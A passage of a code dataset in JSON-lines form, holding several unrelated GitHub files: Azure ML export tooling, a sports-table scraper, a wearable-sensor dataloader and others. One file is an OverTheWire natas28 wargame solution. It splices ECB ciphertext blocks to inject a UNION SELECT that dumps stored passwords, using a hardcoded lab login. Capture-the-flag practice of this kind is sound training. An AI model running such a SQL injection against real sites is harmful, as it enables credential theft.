params\n \"\"\"\n certificate_subject_list_normalized=[]\n for item in certificate_subject_list:\n temp_list=item.strip().split('=')\n temp_list[0]=temp_list[0].strip()\n temp_list[1]=temp_list[1].strip()\n certificate_subject_list_normalized.append(temp_list)\n\n dic=defaultdict(list)\n for item in certificate_subject_list_normalized:\n dic[item[0]].append(item[1])\n certificate_subject_dictionary={}\n for k in dic:\n if len(dic[k]) == 1:\n certificate_subject_dictionary[k]=dic[k][0]\n else:\n certificate_subject_dictionary[k]=dic[k]\n if 'OU' in certificate_subject_dictionary.keys() and type(certificate_subject_dictionary['OU'])==list:\n certificate_subject_dictionary['OU'].sort()\n return certificate_subject_dictionary\n\ndef _which_cmd(self, filename):\n if os.name.lower()=='nt' and sys.platform is not 'cygwin':\n filename+=\".exe\"\n matches=[]\n path_dirs = os.environ.get(\"PATH\").split(os.pathsep)\n path_dirs.insert(0,'.')\n path_dirs.insert(0,self.relative_path_to_packaged_openssl_windows_binary_path)\n\n for directory in path_dirs:\n fullpath = os.path.join(directory, filename)\n if os.path.isfile(fullpath):\n matches.append(fullpath)\n return matches\n\ndef get_data_from_file(file_path):\n with open(file_path,'rb') as f:\n data=f.read()\n return data\n\n\n\n","repo_name":"bcyj/android_tools_leeco_msm8996","sub_path":"common/scripts/SecImage/sectools/common/crypto/utility_functions.py","file_name":"utility_functions.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"18323812757","text":"import json\nimport argparse\nimport tempfile\nfrom azureml.core import Workspace\nfrom azureml.exceptions import WebserviceException\nfrom azureml._model_management._util import _get_mms_url, get_requests_session\nfrom azureml._model_management._constants import (\n AKS_WEBSERVICE_TYPE,\n ACI_WEBSERVICE_TYPE,\n UNKNOWN_WEBSERVICE_TYPE,\n MMS_SYNC_TIMEOUT_SECONDS,\n)\nfrom azureml.core.webservice import Webservice, AciWebservice, AksWebservice\nfrom azureml._restclient.clientbase import ClientBase\n\nMIGRATION_WEBSERVICE_TYPES = [AKS_WEBSERVICE_TYPE, ACI_WEBSERVICE_TYPE]\n\n\ndef export(\n ws: Workspace,\n service_name: str = None,\n timeout_seconds: int = None,\n show_output: bool = True,\n):\n \"\"\"\n Export all services under target workspace into template and parameters.\n :param ws: Target workspace.\n :param service_name: the service name to be migrated.\n :param show_output: Whether print outputs.\n :param timeout_seconds: Timeout settings for waiting export.\n \"\"\"\n base_url = _get_mms_url(ws)\n mms_endpoint = base_url + \"/services/\" + service_name\n headers = {\"Content-Type\": \"application/json\"}\n headers.update(ws._auth_object.get_authentication_header())\n try:\n resp = ClientBase._execute_func(\n get_requests_session().get,\n mms_endpoint,\n headers=headers,\n timeout=MMS_SYNC_TIMEOUT_SECONDS,\n )\n except:\n raise WebserviceException(f\"Cannot get service {service_name}\")\n\n if resp.status_code == 404:\n raise WebserviceException(f\"Service {service_name} does not exist.\")\n\n content = resp.content\n if isinstance(resp.content, bytes):\n content = resp.content.decode(\"utf-8\")\n service = json.loads(content)\n if service[\"state\"] != \"Healthy\":\n raise WebserviceException(\n f\"service {service_name} is unhealthy, migration with this tool is not supported.\"\n )\n compute_type = service[\"computeType\"]\n if compute_type.upper() not in 
MIGRATION_WEBSERVICE_TYPES:\n raise WebserviceException(\n 'Invalid compute type \"{}\". Valid compute types are \"{}\"'.format(\n compute_type, \",\".join(MIGRATION_WEBSERVICE_TYPES)\n )\n )\n compute_name = service_name\n if compute_type.upper() == AKS_WEBSERVICE_TYPE:\n compute_name = service[\"computeName\"]\n\n mms_endpoint = base_url + \"/services/export\"\n export_payload = {\"serviceName\": service_name}\n try:\n resp = ClientBase._execute_func(\n get_requests_session().post,\n mms_endpoint,\n headers=headers,\n json=export_payload,\n )\n except:\n raise WebserviceException(f\"Cannot get service {service_name}\")\n\n if resp.status_code == 202:\n service_entity = None\n if compute_type.upper() == AKS_WEBSERVICE_TYPE:\n service_entity = AksWebservice(ws, service_name)\n elif compute_type.upper() == ACI_WEBSERVICE_TYPE:\n service_entity = AciWebservice(ws, service_name)\n service_entity.state = \"Exporting\"\n service_entity._operation_endpoint = (\n _get_mms_url(service_entity.workspace)\n + f'/operations/{resp.content.decode(\"utf-8\")}'\n )\n state, _, operation = service_entity._wait_for_operation_to_complete(\n show_output, timeout_seconds\n )\n if state == \"Succeeded\":\n export_folder = operation.get(\"resourceLocation\").split(\"/\")[-1]\n storage_account = service_entity.workspace.get_details().get(\n \"storageAccount\"\n )\n if show_output:\n print(\n f\"Services have been exported to storage account: {storage_account} \\n\"\n f\"Folder path: azureml/{export_folder}\"\n )\n return storage_account.split(\"/\")[-1], export_folder, compute_name\n else:\n raise WebserviceException(\n \"Received bad response from Model Management Service:\\n\"\n \"Response Code: {}\\n\"\n \"Headers: {}\\n\"\n \"Content: {}\".format(resp.status_code, resp.headers, resp.content)\n )\n\n\ndef overwrite_parameters(\n parms: dict, endpoint_name: str = None, deployment_name: str = None\n):\n \"\"\"\n Overwrite parameters\n :param deployment_name: v2 online-deployment name. Default will be v1 service name.\n :param endpoint_name: v2 online-endpoint name. 
Default will be v1 service name.\n    :param parms: parameters as dict: loaded v2 parameters.\n    \"\"\"\n    properties = parms[\"onlineEndpointProperties\"][\"value\"]\n    traffic = parms[\"onlineEndpointPropertiesTrafficUpdate\"][\"value\"]\n    properties.pop(\"keys\")\n    traffic.pop(\"keys\")\n    if endpoint_name:\n        parms[\"onlineEndpointName\"][\"value\"] = endpoint_name\n\n    # this is optional\n    if deployment_name:\n        parms[\"onlineDeployments\"][\"value\"][0][\"name\"] = deployment_name\n        traffic[\"traffic\"][deployment_name] = traffic[\"traffic\"].pop(\n            list(traffic[\"traffic\"].keys())[0]\n        )\n\n    temp_file = tempfile.NamedTemporaryFile(mode=\"w+\", suffix=\".json\", delete=False)\n    json.dump(parms, temp_file)  # write out the updated parameters\n    temp_file.flush()\n    print(temp_file.name)\n\n\nif __name__ == \"__main__\":\n\n    def parse_args():\n        parser = argparse.ArgumentParser(description=\"Export v1 service script\")\n        parser.add_argument(\n            \"--export\", action=\"store_true\", help=\"using script for export services\"\n        )\n        parser.add_argument(\n            \"--overwrite-parameters\",\n            action=\"store_true\",\n            help=\"using script for overwrite parameters purpose\",\n        )\n        parser.add_argument(\"-w\", \"--workspace\", type=str, help=\"workspace name\")\n        parser.add_argument(\n            \"-g\", \"--resource-group\", type=str, help=\"resource group name\"\n        )\n        parser.add_argument(\"-s\", \"--subscription\", type=str, help=\"subscription id\")\n        parser.add_argument(\n            \"-sn\",\n            \"--service-name\",\n            default=None,\n            type=str,\n            help=\"service name to be migrated\",\n        )\n        parser.add_argument(\n            \"-e\",\n            \"--export-json\",\n            action=\"store_true\",\n            dest=\"export_json\",\n            help=\"show export result in json\",\n        )\n        parser.add_argument(\n            \"-mp\", \"--parameters-path\", type=str, help=\"parameters file path\"\n        )\n        parser.add_argument(\n            \"-me\",\n            \"--migrate-endpoint-name\",\n            type=str,\n            default=None,\n            help=\"v2 online-endpoint name, default is v1 service name\",\n        )\n        parser.add_argument(\n            \"-md\",\n            \"--migrate-deployment-name\",\n            type=str,\n            default=None,\n            help=\"v2 online-deployment name, default is v1 service name\",\n        )\n        parser.set_defaults(compute_type=None)\n        return parser.parse_args()\n\n    # parse args\n    args = parse_args()\n\n    if args.export:\n        workspace = Workspace.get(\n            name=args.workspace,\n            resource_group=args.resource_group,\n            subscription_id=args.subscription,\n        )\n        storage_account, blob_folder, v1_compute = export(\n            workspace, args.service_name, show_output=not args.export_json\n        )\n        if args.export_json:\n            print(\n                json.dumps(\n                    {\n                        \"storage_account\": storage_account,\n                        \"blob_folder\": blob_folder,\n                        \"v1_compute\": v1_compute,\n                    }\n                )\n            )\n\n    if args.overwrite_parameters:\n        with open(args.parameters_path) as f:\n            online_endpoint_deployment = json.load(f)\n        overwrite_parameters(\n            online_endpoint_deployment,\n            args.migrate_endpoint_name,\n            args.migrate_deployment_name,\n        )\n","repo_name":"Azure/azureml-examples","sub_path":"cli/endpoints/online/managed/migration/export-service-util.py","file_name":"export-service-util.py","file_ext":"py","file_size_in_byte":7975,"program_lang":"python","lang":"en","doc_type":"code","stars":1362,"dataset":"github-code","pt":"37"} +{"seq_id":"11255808232","text":"import cv2\nimport numpy as np\nimport os\nimport math\nimport imageprocess\nfrom array import array\nimport json\n\n\ndef radial_kernel(r, t, max_dist, step, dtdr=0.01):\n\n    step = math.sin(step * math.pi / 2)\n    if step < 0:\n        r_ = r * (-step) + (1 + step) * max_dist / 5\n        t_ = t - (max_dist - r_) * dtdr * (1 + 
step)\n else:\n r_ = r * (step) + (1 - step) * max_dist / 5\n t_ = t + (r_) * dtdr * (1 - step)\n\n return r_, t_\n\n\ndef morph(points, size, center, step):\n\n width, height = size\n\n nx = points[:, 0] - center[0]\n ny = points[:, 1] - center[1]\n r = np.sqrt(nx * nx + ny * ny)\n t = np.arctan2(ny, nx)\n\n r_, t_ = radial_kernel(r, t, math.sqrt(width * width + height * height), step)\n\n alpha = abs(step)\n x_ = r_ * np.cos(t_) + center[0] * (alpha) + (1 - alpha) * width * 0.5\n y_ = r_ * np.sin(t_) + center[1] * (alpha) + (1 - alpha) * height * 0.5\n\n return np.stack([x_, y_], axis=1)\n\n\ndef find_a_center(points):\n centroid = np.mean(points, axis=0)\n cx = centroid[0]\n\n crosses = []\n for i in range(points.shape[0] - 1):\n if (points[i, 0] < cx and cx <= points[i + 1, 0]) or (points[i, 0] >= cx and cx > points[i + 1, 0]):\n crosses.append((points[i, 1] + points[i + 1, 1]) * 0.5)\n\n max_value = 0\n max_index = 0\n for i in range(len(crosses) // 2):\n v = abs(crosses[2 * i] - crosses[2 * i + 1])\n if v > max_value:\n max_value = v\n max_index = i\n\n cy = (crosses[2 * max_index] + crosses[2 * max_index + 1]) * 0.5\n\n return (cx, cy)\n\n\ndef get_contour(img, size, invert=False):\n processed = imageprocess.process_raw(img, size, 0, 0, None, None, flip=False)\n contour = imageprocess.extract_contour(processed if not invert else 255 - processed)\n eqi_length = imageprocess.re_contour(contour, 256)\n return np.array(eqi_length)\n\n\ndef gen_target_for_web_download(cwd, size, invert):\n targets = []\n for file in sorted(os.listdir(cwd)):\n print(file)\n full_path = os.path.join(cwd, file)\n img = cv2.imread(full_path)\n targets.append(get_contour(img, size, invert))\n\n return np.array(targets, dtype=np.float32)\n\n\ndef save_target_for_web_download(save_path, source_dir, size, invert):\n targets = gen_target_for_web_download(source_dir, size, invert)\n\n with open(os.path.join(save_path, \"morph_data\", \"desc.json\"), 'w') as outfile:\n data = []\n data.append({\"t\": \"f\",\n \"shape\": targets.shape,\n \"scale\": size,\n \"path\": \"morph_data/morph.bin\"})\n json.dump(data, outfile)\n\n with open(os.path.join(save_path, \"morph_data\", \"morph.bin\"), 'wb') as output:\n array('f', targets.astype(np.float32).flatten().tolist()).tofile(output)\n\n\nif __name__ == '__main__':\n\n # img_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"templates\", \"large_template_front\", \"0.10.0,0,100,100.png\")\n\n size = (500, 500)\n raw_target_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"data\", \"morph_targets\")\n # img2_path = os.path.join(raw_target_dir, \"08.png\")\n\n # img = cv2.imread(img_path)\n # img2 = cv2.imread(img2_path)\n\n # points = get_contour(img, size)\n # center = find_a_center(points)\n # print(center)\n\n # points2 = get_contour(img2, (500, 500), True)\n\n # for i in np.arange(-1.0, 1.0, 0.05):\n # morphed_points = morph(points if i < 0 else points2, size, center if i < 0 else (250, 250), i)\n # canvas = cv2.fillPoly(np.zeros((size[1], size[0], 3)), [morphed_points.astype(np.int32)], (255, 255, 255), 8)\n # cv2.imshow(\"Gen\", canvas)\n # cv2.waitKey(30)\n\n # gen download file\n save_target_for_web_download(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"web\"), raw_target_dir, size, True)\n","repo_name":"bitstudio/zodiac_google","sub_path":"morph.py","file_name":"morph.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} 
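The save_target_for_web_download routine in the record above persists the morph targets in two pieces: a desc.json descriptor recording the array shape, scale, and a relative binary path, plus a flat stream of float32 values written with array('f').tofile. A minimal reader sketch for that layout (the function name load_morph_targets and the default desc_path are illustrative, not part of the repo; it assumes the web/morph_data paths used above and that reader and writer share the same native byte order, since array.tofile is not endian-neutral):

import json
import os
import numpy as np

def load_morph_targets(desc_path="web/morph_data/desc.json"):
    # desc.json holds a list with a single entry describing the dump.
    with open(desc_path) as f:
        entry = json.load(f)[0]
    # entry["path"] ("morph_data/morph.bin") is relative to the web root,
    # i.e. the directory two levels above desc.json.
    web_root = os.path.dirname(os.path.dirname(desc_path))
    flat = np.fromfile(os.path.join(web_root, entry["path"]), dtype=np.float32)
    # Restore the (n_targets, n_points, 2) contour array saved above.
    return flat.reshape(entry["shape"])

Keeping the shape in the JSON descriptor rather than in the binary stream itself is what lets the same flat morph.bin be decoded unambiguously by the web front end as well.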
+{"seq_id":"73806729067","text":"from node import Node\n\nammenities = Node('ammenities', [])\n\nspecial_needs = Node('special_needs', ammenities)\n\nspecial_needs_ask = Node('special_needs_ask', [ammenities,special_needs ])\n\naccommodation_time = Node('accommodation_time', [special_needs_ask])\nfood_options = Node('food_options', [accommodation_time])\n\nfood = Node('food', [food_options, accommodation_time])\n\nresults = Node('results', [])\n\nsearcher_distance = Node('searcher_distance', [results])\n\nsearcher_number = Node('searcher_number', [searcher_distance])\nofferer_number = Node('offerer_number', [food])\n\nlocation_check = Node('location_check', [searcher_number])\nofferer_location_check = Node('offerer_location_check', [offerer_number])\n\nsearcher_location = Node('searcher_location', [location_check])\nofferer_location = Node('offerer_location', [offerer_location_check])\n\nchoose_type = Node('choose_type', [searcher_location, offerer_location])\nindex = Node('index',[choose_type])\n\nROOT = index\n","repo_name":"olizhu10/ShelterMe","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"16449827108","text":"import requests, os, datetime, json\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\n\n# Grabs the current table and not past ones\n\n# TO CHANGE ------------------------------\n# switch these to command line arguments\nyear = '2020' # if season is split over two years (ie 2020-2021), put the first year here\nfolder_name = 'epl'\nleague = 'ENG.1'\nold_csv = '2001_2020_tables.csv'\n# ----------------------------------------\n\n# GP W D L GF GA GD P\ncols = ['Place', 'Team', 'GP', 'W', 'D', 'L', 'GF', 'GA', 'GD', 'P'] # may need to switch these for other leagues (but prob not)\ntable_df = pd.DataFrame([], columns=cols)\n\nurl = \"https://www.espn.com/soccer/standings/_/league/{}/season/{}\".format(league, year) \n\nr = requests.get(url)\nr.raise_for_status()\nsoup = BeautifulSoup(r.text, \"html.parser\")\n\nteams_soup = soup.find_all('table')[0].find_all('div', class_='team-link flex items-center clr-gray-03')\nteams = []\n\nfor team in teams_soup:\n teams.append([team.contents[0].text, team.find('img').get('title')])\n\nstats = soup.find_all('span', class_='stat-cell')\n\n# Convert to np array and reshape\nstats = [item.text for item in stats]\nnp_stats = np.array(stats).reshape(-1, 8)\n\nfinal_arr = np.concatenate((np.array(teams).reshape(-1, 2), np_stats), axis=1)\ntemp_df = pd.DataFrame(final_arr, columns=cols)\ntemp_df['Year'] = year\ntable_df = table_df.append(temp_df, ignore_index=True)\n\n# if folder doesn't exist, make it\ntpath = os.path.join('data', folder_name, 'tables')\nif not os.path.exists(tpath):\n os.makedirs(tpath)\n \ntable_df.to_csv(os.path.join('data', folder_name, 'tables', year + '_table.csv'), index=False)\n\n# Add it to past tables\nif old_csv != '':\n all_tables_df = pd.read_csv(os.path.join('data', folder_name, 'tables', old_csv))\n all_tables_df = all_tables_df.append(table_df, ignore_index=True)\n all_tables_df.to_csv(os.path.join('data', folder_name, 'tables', 'all_tables.csv'), index=False)\n","repo_name":"jvmohr/dataScience","sub_path":"Soccer/General Data/soccer_table.py","file_name":"soccer_table.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"38935978175","text":"import 
json\nimport re\nimport time\nimport requests\n\n\ndef main():\n \n base_url = 'https://tv.blizzard.cn/action/activities/HDRewardReceive'\n headers = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\"\n }\n # 填cookie\n cookie = {\n \"cookie\": \" \"\n }\n # 填礼品id,默认为OW典藏包\n datas = {\n \"itemCode\": \"OW_UPGRADE\"\n }\n success = 0\n flag = 0\n for num in range(1, 500): \n print(num)\n request = requests.post(base_url, headers=headers, data=datas, cookies=cookie)\n d = json.loads(request.content.decode('utf8'))\n if d['msg'] == 'login':\n text = '暴雪cookie失效了,登陆失败'\n flag = 1\n else:\n if d['msg'] == 'item_limit':\n text = 'OW典藏包领取失败'\n print(d)\n elif d['msg'] == 'success':\n text = 'OW典藏包领取成功'\n print(d)\n flag = 1\n success = 1\n elif d['msg'] == 'exist_record':\n text = '您已拥有该礼品,请勿重复领取'\n print(d)\n flag = 1\n else:\n text = '未知原因引起失败'\n print(d)\n print(text)\n if num == 499:\n flag = 1\n text = '本次尝试领取失败'\n if flag == 1:\n # qq推送\n QmsgKey = \" \"\n if success == 1: \n content = f\"\"\"{text}{d}\"\"\"\n else:\n content = f\"\"\"{text}\"\"\"\n data = {\n \"msg\": content\n }\n url_send = \"https://qmsg.zendee.cn/send/%s\" % (QmsgKey)\n try:\n res = requests.post(url_send, data=data)\n sucmsg = res.json()['success']\n if sucmsg == True:\n print(\"qq推送服务成功\")\n else:\n print(\"qq推送服务失败\")\n except:\n print(\"qq推送参数错误\")\n if flag == 1:\n break\n else:\n time.sleep(3)\n\ndef main_handler(event, context):\n main()\n\nif __name__ == '__main__':\n main()\n","repo_name":"iskyil/Blizzard_TV","sub_path":"tencent/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"21486389268","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 3 12:05:20 2018\n\n@author: Guilherme Fernandes Alves\n\"\"\"\n\n\"\"\" PROBLEMA 8.2 \"\"\"\n### Dados dois inteiros positivos, calcular o máximo divisor comum entre eles\nprint(\"Algoritmo para calcular o mdc entre dois numeros\")\n\n\ndef mdc(a, b):\n i = 1\n mdc = 1\n while i <= a and i <= b:\n if a % i == 0 and b % i == 0:\n mdc = i\n i += 1\n return mdc\n\n\ndef main():\n a = int(input(\"Digite o primeiro numero: \"))\n b = int(input(\"Digite o segundo numero: \"))\n print(\"O Maximo divisor comum entre %d e %d eh: %d\" % (a, b, mdc(a, b)))\n\n\nmain()\nprint(\">>> PRONTO !!!\")\nfim = input(\"Tecle enter para encerrar\")\n","repo_name":"Gui-FernandesBR/MAC2166-2018","sub_path":"examples/3_functions/Problem8.1.py","file_name":"Problem8.1.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7263939625","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n nn.init.kaiming_normal_(m.weight.data)\n m.bias.data.fill_(0)\n\n\nclass Dynamics(torch.nn.Module):\n\n def __init__(self, n_inputs, observation_space):\n super(Dynamics, self).__init__()\n\n self.observation_space = observation_space\n self.state_dim = observation_space.shape[0]\n\n # network architecture specification\n fc1_out = 200\n fc2_out = 200\n\n self.fc1 = nn.Linear(n_inputs, fc1_out)\n self.fc2 = nn.Linear(n_inputs, fc2_out)\n\n # Define the two heads of the network\n # -----------------------------------\n\n # * reward head\n # The reward head has only 1 output\n self.reward_linear = nn.Linear(fc2_out, 
1)\n\n # * dynamics head\n # in the continuous case it has one output for the mean and one for the cov of the state dist\n # later the workers can sample from a normal distribution\n self.mu = nn.Linear(fc1_out, self.state_dim)\n self.sigma = nn.Linear(fc1_out, self.state_dim)\n\n # initialize the weights\n self.apply(init_weights)\n self.train()\n\n def forward(self, inputs):\n \"\"\"\n Defines the forward pass of the network.\n\n :param inputs: Input array object which sufficiently represents the full state of the environment.\n :return: reward, mu, sigma\n \"\"\"\n inputs = inputs.float()\n x = self.fc1(inputs)\n x = F.relu6(x)\n x = self.fc2(x)\n x = F.relu6(x)\n\n # debug output: print the observation-space bounds (no clipping is actually applied)\n print(self.observation_space.high)\n print(self.observation_space.low)\n\n reward = self.reward_linear(x)\n mu = torch.tanh(self.mu(x))\n sigma = F.softplus(self.sigma(x)) + 1e-5\n return reward, mu, sigma\n","repo_name":"QueensGambit/RL-Homework","sub_path":"Challenge_1/ModelsNN.py","file_name":"ModelsNN.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1139511878","text":"import pandas as pd\nimport numpy as np\nimport os\nimport scipy.io as sio\nfrom dataloaders.dataloader_base import BASE_DATA\n# ======================================== WARD_HAR_DATA =============================\nclass WARD_HAR_DATA(BASE_DATA):\n\n \"\"\"\n Reading: A cell structure.\n The number of cells is equal to the number of sensors in the network. \n Each cell contains an array structure of dimension 5×t,\n where 5 corresponds to the sensor readings from 3-axis accelerometer and 2-axis gyroscope on one sensor node, \n and t represents the length of the trial sequence.\n\n • Sensor 1: Outside center of the lower left forearm joint. The y-axis of the gyroscope points to the hand.\n • Sensor 2: Outside center of the lower right forearm joint. The y-axis of the gyroscope points to the hand.\n • Sensor 3: Front center of the waist. The x-axis of the gyroscope points down.\n • Sensor 4: Outside center of the left ankle. The y-axis of the gyroscope points to the foot.\n • Sensor 5: Outside center of the right ankle. 
The y-axis of the gyroscope points to the foot.\n\t\n 20Hz\n \"\"\"\n def __init__(self, args):\n\n\n \"\"\"\n root_path : Root directory of the data set\n difference (bool) : Whether to calculate the first order derivative of the original data\n datanorm_type (str) : Methods of data normalization: \"standardization\", \"minmax\" , \"per_sample_std\", \"per_sample_minmax\"\n \n spectrogram (bool): Whether to convert raw data into frequency representations\n scales : Depends on the sampling frequency of the data \n wavelet : Methods of wavelet transformation\n\n \"\"\"\n\n\n self.used_cols = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24] \n # there are total 5 sensors, each has 5 channels\n\n poses = [\"left forearm\", \"right forearm\", \"waist\", \"left ankle\", \"right ankle\"]\n channel = [\"acc_x\", \"acc_y\", \"acc_z\", \"gyr_x\", \"gyr_y\"]\n self.col_names = [item for sublist in [[col+'_'+pos for col in channel] for pos in poses] for item in sublist]\n\n\n self.label_map = [(1, 'Rest at Standing'), \n (2, 'Rest at Sitting'), \n (3, 'Rest at Lying'), \n (4, 'Walk forward'), \n (5, 'Walk forward left-circle'), \n (6, 'Walk forward right-circle'), \n (7, 'Turn left'), \n (8, 'Turn right'), \n (9, 'Go upstairs'), \n (10, 'Go downstairs'), \n (11, 'Jog'), \n (12, 'Jump'), \n (13, 'Push wheelchair ')]\n # There are in totoal 13 !\n self.drop_activities = []\n\n\n # There are in total 20 subjects.\n self.train_keys = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]\n self.vali_keys = []\n self.test_keys = [18,19,20]\n\n self.exp_mode = args.exp_mode\n self.split_tag = \"sub\"\n\n self.LOCV_keys = [[1,2],[3,4],[5,6],[7,8],[9,10],[11,12],[13,14],[15,16],[17,18],[19,20]]\n\n self.all_keys = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]\n\n self.sub_ids_of_each_sub = {}\n\n self.file_encoding = {} # no use \n \n self.labelToId = {int(x[0]): i for i, x in enumerate(self.label_map)}\n self.all_labels = list(range(len(self.label_map)))\n\n self.drop_activities = [self.labelToId[i] for i in self.drop_activities]\n self.no_drop_activites = [item for item in self.all_labels if item not in self.drop_activities]\n\n super(WARD_HAR_DATA, self).__init__(args)\n\n\n def load_all_the_data(self, root_path):\n\n print(\" ----------------------- load all the data -------------------\")\n\n df_dict = {}\n\n file_list = os.listdir(root_path)\n file_list = [file for file in file_list if \"Sub\" in file]\n\n assert len(file_list)==20\n\n for file in file_list:\n files_of_sub = os.listdir(os.path.join(root_path,file))\n sub = int(file[7:])\n for mat in files_of_sub:\n activity_id = int(mat[1:-6])\n trial = int(mat[-5])\n sub_id = \"{}_{}_{}\".format(sub, activity_id, trial)\n\n data = sio.loadmat(file_name=os.path.join(root_path, file, mat))\n\n values = np.concatenate([data[\"WearableData\"][0][0][5][0][0],\n data[\"WearableData\"][0][0][5][0][1],\n data[\"WearableData\"][0][0][5][0][2],\n data[\"WearableData\"][0][0][5][0][3],\n data[\"WearableData\"][0][0][5][0][4],],axis=1)\n\n df = pd.DataFrame(values, columns= self.col_names)\n df[\"sub\"] = sub\n df[\"activity_id\"] = activity_id\n df[\"sub_id\"] = sub_id\n\n\n if sub not in self.sub_ids_of_each_sub.keys():\n self.sub_ids_of_each_sub[sub] = []\n self.sub_ids_of_each_sub[sub].append(sub_id)\n df_dict[sub_id] = df\n # all data\n df_all = pd.concat(df_dict)\n df_all = df_all.set_index('sub_id')\n\n # Label Transformation\n df_all[\"activity_id\"] = df_all[\"activity_id\"].map(self.labelToId)\n\n # reorder the columns as sensor1, 
sensor2... sensorn, sub, activity_id\n df_all = df_all[self.col_names+[\"sub\"]+[\"activity_id\"]]\n\n data_y = df_all.iloc[:,-1]\n data_x = df_all.iloc[:,:-1]\n\n data_x = data_x.reset_index()\n # sub_id, sensor1, sensor2... sensorn, sub, \n\n return data_x, data_y","repo_name":"YexuZhou/git_conf_run_exp","sub_path":"dataloaders/dataloader_ward_har.py","file_name":"dataloader_ward_har.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8641187351","text":"#!/bin/python3\n\nimport requests, urllib, base64\n\nsite = \"http://natas28.natas.labs.overthewire.org/\"\nauth = (\"natas28\", \"JWwR438wkgTsNKBbcJoowyysdM82YjeF\")\ns = requests.Session()\ns.auth = auth\n\nparams = {'query': ' ' * 10}\nres = s.get(site, params=params)\nblanks = urllib.parse.unquote(res.url.split('=')[1])\nblanks = base64.b64decode(blanks.encode('utf-8'))\nheader = blanks[:48]\nfooter = blanks[48:]\n\nsql = ' ' * 9 + \"' UNION ALL SELECT password FROM users;#\"\nparams = {'query': sql}\nres = s.get(site, params=params)\nexploit = urllib.parse.unquote(res.url.split('=')[1])\nexploit = base64.b64decode(exploit.encode('utf-8'))\n\nnblocks = len(sql) - 10\nlenBlock = (nblocks // 16 + 1) * 16\n\nparams = {'query': base64.b64encode(header + exploit[48:48 + lenBlock] + footer)}\nres = s.get(site + \"search.php\", params=params)\nprint(res.text)","repo_name":"ailtonbsj/live-overflow-tutorials","sub_path":"overthewire-natas/natas28-exploit/step4.py","file_name":"step4.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71202672746","text":"import numpy as np\nimport torch\n\ndef fast_hist(pred, label, n):\n k = (label >= 0) & (label < n)\n bin_count = np.bincount(\n n * label[k].astype(int) + pred[k], minlength = n ** 2)\n torch.cuda.empty_cache()\n return bin_count[:n ** 2].reshape(n, n)\n\n\ndef per_class_iu(hist):\n return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))\n\n\ndef fast_hist_crop(output, target, unique_label):\n hist = fast_hist(output.flatten(), target.flatten(), np.max(unique_label) + 1)\n hist = hist[unique_label, :]\n hist = hist[:, unique_label]\n return hist\n\n#\n# # 统计参数量\n# total = sum([param.nelement() for param in my_model.parameters()])\n# print(\"Number of parameter: % .2fM\" % (total / 1e6))\n\n# 计算gpu显存\ndef get_gpu_memory():\n import platform\n if 'Windows' != platform.system():\n import os\n os.system('nvidia-smi -q -d Memory | grep -A4 GPU | grep Free > tmp.txt')\n memory_gpu = [int(x.split()[2]) for x in open('tmp.txt', 'r').readlines()]\n os.system('rm tmp.txt')\n else:\n memory_gpu = False\n print(\"显存计算不支持windows\")\n return memory_gpu","repo_name":"emilyemliyM/msy1102","sub_path":"confusion_matrix.py","file_name":"confusion_matrix.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25401609012","text":"from pymongo import MongoClient\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nfrom collections import defaultdict\nimport pickle\nfrom blocking import face_to_features\n\ncamera_count = 12\nmin_samples = 20\nmax_features = 1000\n\nclient = MongoClient()\nblocklist = defaultdict(list)\n\nfor camera_id in range(camera_count):\n print(f'analyzing camera {camera_id}')\n \n features = []\n for e in client.vibecheck.raw.find({'camera_id': str(camera_id)}):\n for face 
